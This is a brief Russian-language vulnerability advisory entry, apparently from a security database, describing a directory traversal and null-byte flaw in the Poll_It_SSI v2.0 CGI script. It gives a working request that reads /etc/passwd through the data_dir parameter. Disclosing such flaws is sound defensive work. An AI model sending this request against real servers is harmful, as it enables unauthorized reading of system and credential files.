Классическое сочетание дырок - обратный путь в директориях, "ядовитый 0" и др. приводят в к возможности доступа к любому файлу: /cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/etc/passwd%00
vulners.com/securityvulns/securityvulns:doc:416